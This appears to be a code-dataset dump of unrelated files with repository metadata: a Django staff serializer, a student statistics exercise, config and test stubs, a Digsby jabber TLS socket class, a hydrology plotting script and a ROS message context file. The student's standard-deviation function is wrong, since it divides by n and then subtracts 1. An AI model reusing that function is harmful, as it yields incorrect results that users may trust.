'is_active',
# # Misc (Read Only)
# 'comments',
# Misc (Write Only)
'extra_comment',
'password',
'password_repeat',
# Contact Point
'area_served',
'available_language',
'contact_type',
'email',
'personal_email',
'fax_number',
# 'hours_available', #TODO: FIX
'telephone',
'telephone_extension',
'telephone_type_of',
'other_telephone',
'other_telephone_extension',
'other_telephone_type_of',
# Postal Address
'address_country',
'address_locality',
'address_region',
'post_office_box_number',
'postal_code',
'street_address',
'street_address_extra',
# Geo-coordinate
'elevation',
'latitude',
'longitude',
# 'location' #TODO: FIX
)
def validate_telephone(self, value):
"""
Include validation on no-blanks
"""
if value is None:
raise serializers.ValidationError("This field may not be blank.")
return value
def validate_account_type(self, value):
"""
Include validation for valid choices.
"""
if int_or_none(value) is None:
raise serializers.ValidationError("Please select a valid choice.")
return value
def setup_eager_loading(cls, queryset):
""" Perform necessary eager loading of data. """
queryset = queryset.prefetch_related(
'owner',
'created_by',
'last_modified_by',
# 'comments'
'tags',
)
return queryset
def create(self, validated_data):
"""
Override the `create` function to add extra functinality:
- Create a `User` object in the public database.
- Create a `SharedUser` object in the public database.
- Create a `Staff` object in the tenant database.
- If user has entered text in the 'extra_comment' field then we will
a `Comment` object and attach it to the `Staff` object.
- We will attach the staff user whom created this `Staff` object.
"""
# Format our telephone(s)
fax_number = validated_data.get('fax_number', None)
if fax_number:
fax_number = phonenumbers.parse(fax_number, "CA")
telephone = validated_data.get('telephone', None)
if telephone:
telephone = phonenumbers.parse(telephone, "CA")
other_telephone = validated_data.get('other_telephone', None)
if other_telephone:
other_telephone = phonenumbers.parse(other_telephone, "CA")
validated_data['fax_number'] = fax_number
validated_data['telephone'] = telephone
validated_data['other_telephone'] = other_telephone
# Extract our "email" field.
email = validated_data.get('email', None)
personal_email = validated_data.get('personal_email', None)
#-------------------
# Create our user.
#-------------------
owner = SharedUser.objects.create(
first_name=validated_data['given_name'],
last_name=validated_data['last_name'],
email=email,
is_active=validated_data['is_active'],
franchise=self.context['franchise'],
was_email_activated=True
)
logger.info("Created shared user.")
# Attach the user to the `group` group.
account_type = int_or_none(validated_data.get('account_type', None))
if account_type:
owner.groups.set([account_type])
# Update the password.
password = validated_data.get('password', None)
owner.set_password(password)
owner.save()
#---------------------------------------------------
# Create our `Staff` object in our tenant schema.
#---------------------------------------------------
# Create an "Staff".
staff = Staff.objects.create(
created_by=self.context['created_by'],
last_modified_by=self.context['created_by'],
description=validated_data.get('description', None),
# Person
given_name=validated_data['given_name'],
last_name=validated_data['last_name'],
middle_name=validated_data['middle_name'],
birthdate=validated_data.get('birthdate', None),
join_date=validated_data.get('join_date', None),
gender=validated_data.get('gender', None),
# Misc
created_from = self.context['created_from'],
created_from_is_public = self.context['created_from_is_public'],
# . . .
# Contact Point
area_served=validated_data.get('area_served', None),
available_language=validated_data.get('available_language', None),
contact_type=validated_data.get('contact_type', None),
email=email,
personal_email=personal_email,
fax_number=fax_number,
# 'hours_available', #TODO: IMPLEMENT.
telephone=telephone,
telephone_extension=validated_data.get('telephone_extension', None),
telephone_type_of=validated_data.get('telephone_type_of', None),
other_telephone=other_telephone,
other_telephone_extension=validated_data.get('other_telephone_extension', None),
other_telephone_type_of=validated_data.get('other_telephone_type_of', None),
# Postal Address
address_country=validated_data.get('address_country', None),
address_locality=validated_data.get('address_locality', None),
address_region=validated_data.get('address_region', None),
post_office_box_number=validated_data.get('post_office_box_number', None),
postal_code=validated_data.get('postal_code', None),
street_address=validated_data.get('street_address', None),
street_address_extra=validated_data.get('street_address_extra', None),
# Geo-coordinate
elevation=validated_data.get('elevation', None),
latitude=validated_data.get('latitude', None),
longitude=validated_data.get('longitude', None),
# 'location' #TODO: IMPLEMENT.
)
logger.info("Created staff member.")
# Update our staff again.
staff.owner = owner
staff.email = email
staff.save()
logger.info("Attached user object to staff member.")
#------------------------
# Set our `Tag` objects.
#------------------------
tags = validated_data.get('tags', None)
if tags is not None:
if len(tags) > 0:
staff.tags.set(tags)
#-----------------------------
# Create our `Comment` object.
#-----------------------------
extra_comment = validated_data.get('extra_comment', None)
if extra_comment is not None:
comment = Comment.objects.create(
created_by=self.context['created_by'],
last_modified_by=self.context['created_by'],
text=extra_comment,
created_from = self.context['created_from'],
created_from_is_public = self.context['created_from_is_public']
)
staff_comment = StaffComment.objects.create(
about=staff,
comment=comment,
)
# Update validation data.
# validated_data['comments'] = StaffComment.objects.filter(staff=staff)
validated_data['created_by'] = self.context['created_by']
validated_data['last_modified_by'] = self.context['created_by']
validated_data['extra_comment'] = None
validated_data['id'] = staff.id
# Return our validated data.
return validated_data
class StaffRetrieveUpdateDestroySerializer(serializers.ModelSerializer):
# owner = serializers.PrimaryKeyRelatedField(many=False, read_only=True)
# We are overriding the `email` field to include unique email validation.
email = serializers.EmailField(
validators=[UniqueValidator(queryset=Staff.objects.all())],
required=False
)
personal_email = serializers.EmailField(
validators=[UniqueValidator(queryset=Staff.objects.all())],
required=False
)
# Add password adding.
password = serializers.CharField(
write_only=True,
required=False,
allow_blank=True,
max_length=63,
style={'input_type': 'password'},
validators = [
MatchingDuelFieldsValidator(
another_field='password_repeat',
message=_("Inputted passwords fields do not match.")
),
EnhancedPasswordStrengthFieldValidator()
]
)
password_repeat = serializers.CharField(
write_only=True,
required=False,
allow_blank=True,
max_length=63,
style={'input_type': 'password'}
)
is_active = serializers.BooleanField(
write_only=True,
required=True,
error_messages={
"invalid": _("Please pick either 'Yes' or 'No' choice.")
}
)
# This field is used to assign the user to the group.
account_type = serializers.CharField(
write_only=True,
allow_null=False,
required=True
)
# All comments are created by our `create` function and not by
# # `django-rest-framework`.
# comments = StaffCommentSerializer(many=True, read_only=True)
#
# # This is a field used in the `create` function if the user enters a
# # comment. This field is *ONLY* to be used during the POST creation and
# # will be blank during GET.
# extra_comment = serializers.CharField(write_only=True, allow_null=True)
# Custom formatting of our telephone fields.
fax_number = PhoneNumberField(allow_null=True, required=False)
telephone = PhoneNumberField(allow_null=True, required=False)
other_telephone = PhoneNumberField(allow_null=True, required=False)
# Meta Information.
class Meta:
model = Staff
fields = (
# Thing
'id',
'created',
'last_modified',
# 'owner',
'description',
'account_type',
# Person
'given_name',
'middle_name',
'last_name',
'birthdate',
'join_date',
'gender',
# Misc (Read/Write)
'tags',
'is_active',
# # 'is_senior',
# # 'is_support',
# # 'job_info_read',
# 'how_hear',
#
# # Misc (Read Only)
# 'comments',
#
# # Misc (Write Only)
'password',
'password_repeat',
# 'extra_comment',
# Contact Point
'area_served',
'available_language',
'contact_type',
'email',
'personal_email',
'fax_number',
# 'hours_available', #TODO: FIX
'telephone',
'telephone_extension',
'telephone_type_of',
'other_telephone',
'other_telephone_extension',
'other_telephone_type_of',
# Postal Address
'address_country',
'address_locality',
'address_region',
'post_office_box_number',
'postal_code',
'street_address',
'street_address_extra',
# Geo-coordinate
'elevation',
'latitude',
'longitude',
# 'location' #TODO: FIX
)
def setup_eager_loading(cls, queryset):
""" Perform necessary eager loading of data. """
queryset = queryset.prefetch_related(
'owner',
'created_by',
'last_modified_by',
# 'comments'
'tags',
)
return queryset
def validate_account_type(self, value):
"""
Include validation for valid choices.
"""
if int_or_none(value) is None:
raise serializers.ValidationError("Please select a valid choice.")
return value
def validate_personal_email(self, value):
"""
Include validation for valid choices.
"""
if value is None or value == '':
raise serializers.ValidationError("This field may not be blank.")
return value
def update(self, instance, validated_data):
"""
Override this function to include extra functionality.
"""
# For debugging purposes only.
# print(validated_data)
# Get our inputs.
email = validated_data.get('email', instance.email)
personal_email = validated_data.get('personal_email', None)
#-------------------------------------
# Bugfix: Created `SharedUser` object.
#-------------------------------------
if instance.owner is None:
owner = SharedUser.objects.filter(email=email).first()
if owner:
instance.owner = owner
instance.save()
logger.info("BUGFIX: Attached existing shared user to staff.")
else:
instance.owner = SharedUser.objects.create(
first_name=validated_data['given_name'],
last_name=validated_data['last_name'],
email=email,
is_active=validated_data['is_active'],
franchise=self.context['franchise'],
was_email_activated=True
)
instance.save()
logger.info("BUGFIX: Created shared user and attached to staff.")
#---------------------------
# Update `SharedUser` object.
#---------------------------
# Update the password if required.
password = validated_data.get('password', None)
if password:
instance.owner.set_password(password)
logger.info("Updated the password.")
# Update the account.
if email:
instance.owner.email = email
instance.owner.username = get_unique_username_from_email(email)
instance.owner.first_name = validated_data.get('given_name', instance.owner.first_name)
instance.owner.last_name = validated_data.get('last_name', instance.owner.last_name)
instance.owner.is_active = validated_data.get('is_active', instance.owner.is_active)
instance.owner.save()
logger.info("Updated the shared user.")
# Attach the user to the `group` group.
account_type = validated_data.get('account_type', None)
if account_type != "NaN":
account_type = int(account_type)
instance.owner.groups.set([account_type])
logger.info("Updated the group membership.")
#---------------------------
# Update `Staff` object.
#---------------------------
# Person
instance.description=validated_data.get('description', None)
instance.given_name=validated_data.get('given_name', None)
instance.last_name=validated_data.get('last_name', None)
instance.middle_name=validated_data.get('middle_name', None)
instance.birthdate=validated_data.get('birthdate', None)
instance.join_date=validated_data.get('join_date', None)
instance.gender=validated_data.get('gender', None)
# Misc
instance.hourly_salary_desired=validated_data.get('hourly_salary_desired', 0.00)
instance.limit_special=validated_data.get('limit_special', None)
instance.dues_date=validated_data.get('dues_date', None)
instance.commercial_insurance_expiry_date=validated_data.get('commercial_insurance_expiry_date', None)
instance.police_check=validated_data.get('police_check', None)
instance.drivers_license_class=validated_data.get('drivers_license_class', None)
instance.how_hear=validated_data.get('how_hear', None)
instance.last_modified_by = self.context['last_modified_by']
instance.last_modified_from = self.context['last_modified_from']
instance.last_modified_from_is_public = self.context['last_modified_from_is_public']
# 'organizations', #TODO: IMPLEMENT.
# Contact Point
instance.area_served=validated_data.get('area_served', None)
instance.available_language=validated_data.get('available_language', None)
instance.contact_type=validated_data.get('contact_type', None)
instance.email=email
instance.personal_email=personal_email
instance.fax_number=validated_data.get('fax_number', None)
# 'hours_available', #TODO: IMPLEMENT.
instance.telephone=validated_data.get('telephone', None)
instance.telephone_extension=validated_data.get('telephone_extension', None)
instance.telephone_type_of=validated_data.get('telephone_type_of', None)
instance.other_telephone=validated_data.get('other_telephone', None)
instance.other_telephone_extension=validated_data.get('other_telephone_extension', None)
instance.other_telephone_type_of=validated_data.get('other_telephone_type_of', None)
# Postal Address
instance.address_country=validated_data.get('address_country', None)
instance.address_locality=validated_data.get('address_locality', None)
instance.address_region=validated_data.get('address_region', None)
instance.post_office_box_number=validated_data.get('post_office_box_number', None)
instance.postal_code=validated_data.get('postal_code', None)
instance.street_address=validated_data.get('street_address', None)
instance.street_address_extra=validated_data.get('street_address_extra', None)
# Geo-coordinate
instance.elevation=validated_data.get('elevation', None)
instance.latitude=validated_data.get('latitude', None)
instance.longitude=validated_data.get('longitude', None)
# 'location' #TODO: IMPLEMENT.
# Save our instance.
instance.save()
logger.info("Updated the staff member.")
#------------------------
# Set our `Tag` objects.
#------------------------
tags = validated_data.get('tags', None)
if tags is not None:
if len(tags) > 0:
instance.tags.set(tags)
#---------------------------
# Attach our comment.
#---------------------------
extra_comment = validated_data.get('extra_comment', None)
if extra_comment is not None:
comment = Comment.objects.create(
created_by=self.context['last_modified_by'],
last_modified_by=self.context['last_modified_by'],
text=extra_comment,
created_from = self.context['last_modified_from'],
created_from_is_public = self.context['last_modified_from_is_public']
)
staff_comment = StaffComment.objects.create(
staff=instance,
comment=comment,
)
#---------------------------
# Update validation data.
#---------------------------
# validated_data['comments'] = StaffComment.objects.filter(staff=instance)
validated_data['last_modified_by'] = self.context['last_modified_by']
# validated_data['extra_comment'] = None
# Return our validated data.
return validated_data
| [
"[email protected]"
]
| |
05c69d86a598279fd05f359ed4b55dbf7789ecbb | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/96/usersdata/212/52473/submittedfiles/estatistica.py | 833c7315b45ff153b15c5cbf6daf19fb0e037238 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,004 | py | # -*- coding: utf-8 -*-
def media(lista):
soma = 0
for i in range(0,len(lista),1):
soma = soma + lista[i]
resultado = soma/len(lista)
return resultado
#Baseado na função acima, escreva a função para calcular o desvio padrão de uma lista
def desvio(lista):
soma=0
dp=0
m=media(lista)
n=len(lista)
for i in range(0,n,1):
soma=soma+(lista[i]-(media(lista)))**2
soma=((soma/n-1))**(1/2)
return soma
#Por último escreva o programa principal, que pede a entrada e chama as funções criadas.
n1=int(input('digite o número de elemetos da primeira lista:'))
l1=[]
i=0
while i<n1:
elemento=float(input('digite um número:'))
l1.append(elemento)
i=i+1
n2=int(input('digite o número de elemetos da segunda lista:'))
l2=[]
i=0
while i<n2:
elemento=float(input('digite um número:'))
l2.append(elemento)
i=i+1
m1=media(l1)
print('%.2f'%m1)
dp1=desvio(l1)
print(dp1)
m2=media(l2)
print('%.2f'%m2)
dp2=desvio(l2)
print(dp2) | [
"[email protected]"
]
| |
6a4ee598f47454db0493b131fcdf35f2e2f999bb | 66d04b8c46feef85c1666a4ba467124ee2c18450 | /lambdas/layer/.chalice/config.json.template.py | 3d375499fa4760654e91540304e9ac9cb68879d9 | [
"Apache-2.0"
]
| permissive | DataBiosphere/azul | 767abdefafbaf714fb78e5ee1aa5224b07fa7ec1 | 3722323d4eed3089d25f6d6c9cbfb1672b7de939 | refs/heads/develop | 2023-09-01T12:26:21.387100 | 2023-09-01T00:01:46 | 2023-09-01T00:01:46 | 139,095,537 | 23 | 22 | Apache-2.0 | 2023-09-14T18:00:44 | 2018-06-29T03:18:14 | Python | UTF-8 | Python | false | false | 263 | py | from azul import config
from azul.template import emit
emit({
"version": "2.0",
"app_name": config.qualified_resource_name("dependencies"),
"api_gateway_stage": config.deployment_stage,
"manage_iam_role": False,
"lambda_memory_size": 128,
})
| [
"[email protected]"
]
| |
e71c296d26a1fc078ab5b6286026948ef2b23459 | 0beaf9d78d03100b2aebaaac38fb343d425f2b6a | /tests/regression/gsheet/test_chrome_gsheet_100r_number_utf8chars.py | 57e29b0c39b7eec92f89400c4f2f06c356e2ae5d | []
| no_license | digitarald/Hasal | 462fc044bb4a754c8d76c0bfb0df519f1786fdcc | c496afae6ec2e3743148f3a6288b78f120100513 | refs/heads/master | 2021-01-13T14:29:44.471037 | 2016-11-04T10:49:19 | 2016-11-04T10:49:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from lib.perfBaseTest import PerfBaseTest
class TestSikuli(PerfBaseTest):
def setUp(self):
super(TestSikuli, self).setUp()
def test_chrome_gsheet_100r_number_utf8chars(self):
self.test_url = self.env.GSHEET_TEST_URL_SPEC % self.env.TEST_TARGET_ID_100R_NUMBER_UTF8CHAR
self.sikuli_status = self.sikuli.run_test(self.env.test_name, self.env.output_name, test_target=self.test_url, script_dp=self.env.test_script_py_dp)
| [
"[email protected]"
]
| |
bc25b8a888412a5a123d8375db6d22ff7ea6760c | fd48fba90bb227017ac2da9786d59f9b9130aaf0 | /digsby/src/jabber/threadstreamsocket.py | bec1c1382c048055bceedd2e48336ceb8812b1b6 | [
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | niterain/digsby | bb05b959c66b957237be68cd8576e3a7c0f7c693 | 16a62c7df1018a49eaa8151c0f8b881c7e252949 | refs/heads/master | 2021-01-18T10:07:10.244382 | 2013-11-03T02:48:25 | 2013-11-03T02:48:25 | 5,991,568 | 1 | 0 | null | 2013-11-03T02:48:26 | 2012-09-28T02:24:50 | Python | UTF-8 | Python | false | false | 8,488 | py | from asynchat import async_chat
from util.threads.threadpool2 import threaded
from common import netcall
from util.callbacks import callsback
from common import pref
import sys
import socket
import logging
import common
from util.primitives.synchronization import lock
from util.primitives.funcs import get
try:
import M2Crypto
if M2Crypto.version_info < (0, 16):
tls_available = 0
else:
from M2Crypto import SSL
from M2Crypto.SSL import SSLError
import M2Crypto.SSL.cb
tls_available = 1
SSL_ERROR_WANT_WRITE = SSL.m2.ssl_error_want_write
SSL_ERROR_WANT_READ = SSL.m2.ssl_error_want_read
except ImportError:
tls_available = 0
class ThreadStreamSocket(common.socket):
ac_in_buffer_size = 4096 * 16
ac_out_buffer_size = 4096 * 16
def __init__(self, sock, collect, term, on_close, on_error, ssl=False):
self.term = term
self.tls = None if not ssl else sock
self.collect_incoming_data = collect
self.set_terminator(self.term)
self.__logger=logging.getLogger("ThreadStreamSocket")
self.on_close = on_close
self.on_error = on_error
self.killed = False
self.lastbuffer = ''
self.__want_write = False
self.__want_read = False
common.socket.__init__(self, sock)
def found_terminator(self):
self.set_terminator(self.term)
def handle_error(self, e=None):
import traceback;traceback.print_exc()
t, v = sys.exc_info()[:2]
if t is not None:
msg = get(get(v.args, 0, 'say what?'), 'message', '')
if msg.startswith('bad write retry'):
assert False
self.__logger.error('Got that weird-ass "bad write retry" message in jabber socket')
# return
sslzero_closes = pref('jabber.ssl_error_zero.should_close', type = bool, default = True)
if t is SSLError and get(v.args, 0, sentinel) == 0:
self.__logger('SSL error 0!')
if not sslzero_closes:
self.__logger('\tnot closing')
return
self.__logger.debug('handle_error in %r', self)
async_chat.close(self)
if not self.killed:
self.killed = True
self.on_error()
def handle_close(self):
self.__logger.debug('handle_close in %r', self)
async_chat.close(self)
if not self.killed:
self.killed = True
self.on_close()
@lock
@callsback
def make_tls(self, ctx, callback=None):
self._realfileno = self._fileno
self.socket.setblocking(True)
self.del_channel()
dbg = self.__logger.debug
def blocking_connect():
try:
dbg("Creating TLS connection")
self.tls = SSL.Connection(ctx, self.socket)
dbg("Setting up TLS connection")
self.tls.setup_ssl()
dbg("Setting TLS connect state")
self.tls.set_connect_state()
dbg("Starting TLS handshake")
# self.tls.setblocking(True)
self.tls.connect_ssl()
self.socket.setblocking(False)
self.tls.setblocking(False)
self.ssocket = self.socket
self.socket = self.tls
except Exception, e:
try:
self.socket.close()
self.tls.close()
dbg('There was an exception in TLS blocking_connect: %r', e)
except Exception:
pass
raise e
def win():
self._fileno = self._realfileno
self.add_channel()
callback.success()
def lose(e):
netcall(callback.error)
threaded(blocking_connect)(success = lambda: netcall(win), error=lose)
def recv(self, buffer_size=4096):
self.__want_read = False
try:
return common.socket.recv(self, buffer_size)
except SSLError, e:
if e.args[0] == SSL_ERROR_WANT_WRITE:
self.__want_write = True
self.__want_read = False
self.__logger.warning("read_want_write")
return ""
elif e.args[0] == SSL_ERROR_WANT_READ:
self.__want_write = False
self.__want_read = True
self.__logger.warning("read_want_read")
return ""
else:
raise socket.error(e)
def send(self, buffer):
self.__want_write = False
# buffer = str(buffer)
if self.tls is None:
return common.socket.send(self, buffer)
## # M2Crypto returns -1 to mean "retry the last write." It has the
## # strange requirement that exactly the same bytes are tried again
## # during the next write--so we need to keep our own buffer.
r = None
if not self.lastbuffer:
try:
r = self.socket.sendall(buffer)
except SSLError, e:
if e.args[0] == SSL_ERROR_WANT_WRITE:
self.__want_write = True
self.__want_read = False
self.__logger.warning("write_want_write")
self.lastbuffer = buffer # -1: store the bytes for later
return len(buffer) # consume from asyncore
elif e.args[0] == SSL_ERROR_WANT_READ:
self.__want_write = False
self.__want_read = True
self.__logger.warning("write_want_read")
return 0
else:
raise socket.error(e, r)
else:
if r < 0:
raise socket.error('unknown -1 for ssl send')
return r
else:
try:
# we've got saved bytes--send them first.
r = self.socket.sendall(self.lastbuffer)
except SSLError, e:
if e.args[0] == SSL_ERROR_WANT_WRITE:
self.__want_write = True
self.__want_read = False
self.__logger.warning("write_want_write (buffer)")
elif e.args[0] == SSL_ERROR_WANT_READ:
self.__want_write = False
self.__want_read = True
self.__logger.warning("write_want_read (buffer)")
else:
raise socket.error(e, r)
else:
if r < 0:
raise socket.error('unknown -1 for ssl send (buffer)')
elif r < len(self.lastbuffer):
self.lastbuffer = self.lastbuffer[r:]
else:
self.lastbuffer = ''
return 0
def initiate_send(self):
#if there's nothing else in the socket buffer, the super class initiate_send won't call send
# and self.lastbuffer won't be flushed.
if self.lastbuffer:
assert self.tls is not None
assert self.__want_write
self.send(None)
return
return common.socket.initiate_send(self)
def readable (self):
"predicate for inclusion in the readable for select()"
assert not (self.__want_read and self.__want_write)
return not self.__want_write and (self.__want_read or
common.socket.readable(self))# and not self.lastbuffer
def writable (self):
assert not (self.__want_read and self.__want_write)
"predicate for inclusion in the writable for select()"
# return len(self.ac_out_buffer) or len(self.producer_fifo) or (not self.connected)
# this is about twice as fast, though not as clear.
return (common.socket.writable(self) #async buffer + connection
or self.lastbuffer #out buffer
or self.__want_write) and not self.__want_read
def _repr(self):
return 'wr:%s ww:%s lb:%s' % (self.__want_read, self.__want_write, self.lastbuffer)
class ThreadStreamSSLSocket(common.socket):
def __init__(self, sock, collect, term):
self.collect_incoming_data = collect
self.set_terminator(term)
self.__logger = logging.getLogger("ThreadStreamSSLSocket")
common.socket.__init__(self, sock)
| [
"[email protected]"
]
| |
252a725708758cf720a94811657ecfdfd0b1d90d | 0206ac23a29673ee52c367b103dfe59e7733cdc1 | /src/crcm5/analyse_hdf/lake_effect_on_streamflow_quantiles.py | f129054251e6b9dd8519fa5d776392060593cf5a | []
| no_license | guziy/RPN | 2304a93f9ced626ae5fc8abfcc079e33159ae56a | 71b94f4c73d4100345d29a6fbfa9fa108d8027b5 | refs/heads/master | 2021-11-27T07:18:22.705921 | 2021-11-27T00:54:03 | 2021-11-27T00:54:03 | 2,078,454 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 7,676 | py | import os
from datetime import datetime
import brewer2mpl
from matplotlib.axes import Axes
from matplotlib.font_manager import FontProperties
from matplotlib.ticker import MaxNLocator, ScalarFormatter
from crcm5 import infovar
from data import cehq_station
from data.cehq_station import Station
from data.cell_manager import CellManager
from . import do_analysis_using_pytables as analysis
import matplotlib.pyplot as plt
import numpy as np
__author__ = 'huziy'
images_folder = "/home/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/images_for_lake-river_paper"
from . import common_plot_params as cpp
def plot_one_to_one_line(the_ax):
assert isinstance(the_ax, Axes)
x1, x2 = the_ax.get_xlim()
y1, y2 = the_ax.get_ylim()
lims = [x1, x2, y1, y2]
z = min(lims), max(lims)
the_ax.plot(z, z, "-.k")
def main():
start_year = 1980
end_year = 2010
start_date = datetime(start_year, 1, 1)
end_date = datetime(end_year, 12, 31)
ids_with_lakes_upstream = [
"104001", "093806", "093801", "081002", "081007", "080718"
]
selected_station_ids = ["092715", "074903", "080104", "081007", "061905",
"093806", "090613", "081002", "093801", "080718", "104001"]
selected_station_ids = ids_with_lakes_upstream
# Get the list of stations to do the comparison with
stations = cehq_station.read_station_data(
start_date=start_date,
end_date=end_date,
selected_ids=selected_station_ids
)
# add hydat stations
# province = "QC"
# min_drainage_area_km2 = 10000.0
# stations_hd = cehq_station.load_from_hydat_db(start_date=start_date, end_date=end_date,
# province=province, min_drainage_area_km2=min_drainage_area_km2)
# if not len(stations_hd):
# print "No hydat stations satisying the conditions: period {0}-{1}, province {2}".format(
# str(start_date), str(end_date), province
# )
# stations.extend(stations_hd)
# brewer2mpl.get_map args: set name set type number of colors
bmap = brewer2mpl.get_map("Set1", "qualitative", 9)
path1 = "/skynet3_rech1/huziy/hdf_store/quebec_0.1_crcm5-hcd-r.hdf5"
label1 = "CRCM5-L1"
path2 = "/skynet3_rech1/huziy/hdf_store/quebec_0.1_crcm5-hcd-rl.hdf5"
label2 = "CRCM5-L2"
color2, color1 = bmap.mpl_colors[:2]
fldirs = analysis.get_array_from_file(path=path1, var_name=infovar.HDF_FLOW_DIRECTIONS_NAME)
lons2d, lats2d, basemap = analysis.get_basemap_from_hdf(path1)
lake_fractions = analysis.get_array_from_file(path=path1, var_name=infovar.HDF_LAKE_FRACTION_NAME)
# cell_areas = analysis.get_array_from_file(path=path1, var_name=infovar.HDF_CELL_AREA_NAME)
acc_area = analysis.get_array_from_file(path=path1, var_name=infovar.HDF_ACCUMULATION_AREA_NAME)
cell_manager = CellManager(fldirs, lons2d=lons2d, lats2d=lats2d, accumulation_area_km2=acc_area)
station_to_mp = cell_manager.get_model_points_for_stations(station_list=stations,
lake_fraction=lake_fractions,
drainaige_area_reldiff_limit=0.3)
fig, axes = plt.subplots(1, 2, gridspec_kw=dict(top=0.80, wspace=0.4))
q90_obs_list = []
q90_mod1_list = []
q90_mod2_list = []
q10_obs_list = []
q10_mod1_list = []
q10_mod2_list = []
for the_station, the_mp in station_to_mp.items():
assert isinstance(the_station, Station)
compl_years = the_station.get_list_of_complete_years()
if len(compl_years) < 3:
continue
t, stfl1 = analysis.get_daily_climatology_for_a_point(path=path1, years_of_interest=compl_years,
i_index=the_mp.ix, j_index=the_mp.jy, var_name="STFA")
_, stfl2 = analysis.get_daily_climatology_for_a_point(path=path2, years_of_interest=compl_years,
i_index=the_mp.ix, j_index=the_mp.jy, var_name="STFA")
_, stfl_obs = the_station.get_daily_climatology_for_complete_years(stamp_dates=t, years=compl_years)
# Q90
q90_obs = np.percentile(stfl_obs, 90)
q90_mod1 = np.percentile(stfl1, 90)
q90_mod2 = np.percentile(stfl2, 90)
# Q10
q10_obs = np.percentile(stfl_obs, 10)
q10_mod1 = np.percentile(stfl1, 10)
q10_mod2 = np.percentile(stfl2, 10)
# save quantiles to lists for correlation calculation
q90_obs_list.append(q90_obs)
q90_mod1_list.append(q90_mod1)
q90_mod2_list.append(q90_mod2)
q10_mod1_list.append(q10_mod1)
q10_mod2_list.append(q10_mod2)
q10_obs_list.append(q10_obs)
# axes[0].annotate(the_station.id, (q90_obs, np.percentile(stfl1, 90)))
# axes[1].annotate(the_station.id, (q10_obs, np.percentile(stfl1, 10)))
# Plot scatter plot of Q90
the_ax = axes[0]
# the_ax.annotate(the_station.id, (q90_obs, np.percentile(stfl1, 90)))
the_ax.scatter(q90_obs_list, q90_mod1_list, label=label1, c=color1)
the_ax.scatter(q90_obs_list, q90_mod2_list, label=label2, c=color2)
# plot scatter plot of Q10
the_ax = axes[1]
# the_ax.annotate(the_station.id, (q10_obs, np.percentile(stfl1, 10)))
h1 = the_ax.scatter(q10_obs_list, q10_mod1_list, label=label1, c=color1)
h2 = the_ax.scatter(q10_obs_list, q10_mod2_list, label=label2, c=color2)
# Add correlation coefficients to the axes
fp = FontProperties(size=14, weight="bold")
axes[0].annotate(r"$R^2 = {0:.2f}$".format(np.corrcoef(q90_mod1_list, q90_obs_list)[0, 1] ** 2),
(0.1, 0.85), color=color1, xycoords="axes fraction", font_properties=fp)
axes[0].annotate(r"$R^2 = {0:.2f}$".format(np.corrcoef(q90_mod2_list, q90_obs_list)[0, 1] ** 2),
(0.1, 0.70), color=color2, xycoords="axes fraction", font_properties=fp)
axes[1].annotate(r"$R^2 = {0:.2f}$".format(np.corrcoef(q10_mod1_list, q10_obs_list)[0, 1] ** 2),
(0.1, 0.85), color=color1, xycoords="axes fraction", font_properties=fp)
axes[1].annotate(r"$R^2 = {0:.2f}$".format(np.corrcoef(q10_mod2_list, q10_obs_list)[0, 1] ** 2),
(0.1, 0.70), color=color2, xycoords="axes fraction", font_properties=fp)
sf = ScalarFormatter(useMathText=True)
sf.set_powerlimits((-2, 3))
for ind, the_ax in enumerate(axes):
plot_one_to_one_line(the_ax)
if ind == 0:
the_ax.set_xlabel(r"Observed $\left({\rm m^3/s} \right)$")
the_ax.set_ylabel(r"Modelled $\left({\rm m^3/s} \right)$")
the_ax.annotate(r"$Q_{90}$" if ind == 0 else r"$Q_{10}$",
(0.95, 0.95), xycoords="axes fraction",
bbox=dict(facecolor="white"),
va="top", ha="right")
the_ax.xaxis.set_major_formatter(sf)
the_ax.yaxis.set_major_formatter(sf)
locator = MaxNLocator(nbins=5)
the_ax.xaxis.set_major_locator(locator)
the_ax.yaxis.set_major_locator(locator)
x1, x2 = the_ax.get_xlim()
# Since streamflow percentiles can only be positive
the_ax.set_xlim(0, x2)
the_ax.set_ylim(0, x2)
fig.legend([h1, h2], [label1, label2], loc="upper center", ncol=2)
figpath = os.path.join(images_folder, "percentiles_comparison.png")
# plt.tight_layout()
fig.savefig(figpath, dpi=cpp.FIG_SAVE_DPI, bbox_inches="tight")
if __name__ == "__main__":
import application_properties
application_properties.set_current_directory()
main() | [
"[email protected]"
]
| |
b8a196d6aa3611a6fbcce7ad132fcd437d7f6bf3 | b1b86d8528df27d99ed56ed16f1ba15b5ae78661 | /build_isolated/waterplus_map_tools/cmake/waterplus_map_tools-genmsg-context.py | 13af763d2d6d2c9932b8be57f4bfc5f85289af4d | []
| no_license | gychen-n/match | 8754ac128b43f81e00faf3ab2af160af70a1d4a3 | ec91f19d104aa4a827c9f66d362f94fe44739cad | refs/heads/main | 2023-04-09T19:56:55.507118 | 2021-04-15T13:39:02 | 2021-04-15T13:39:02 | 358,268,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/gyc/match_ws/src/tools/waterplus_map_tools/msg/Waypoint.msg"
services_str = "/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/SaveWaypoints.srv;/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/AddNewWaypoint.srv;/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/GetNumOfWaypoints.srv;/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/GetWaypointByIndex.srv;/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/GetWaypointByName.srv"
pkg_name = "waterplus_map_tools"
dependencies_str = "std_msgs;geometry_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
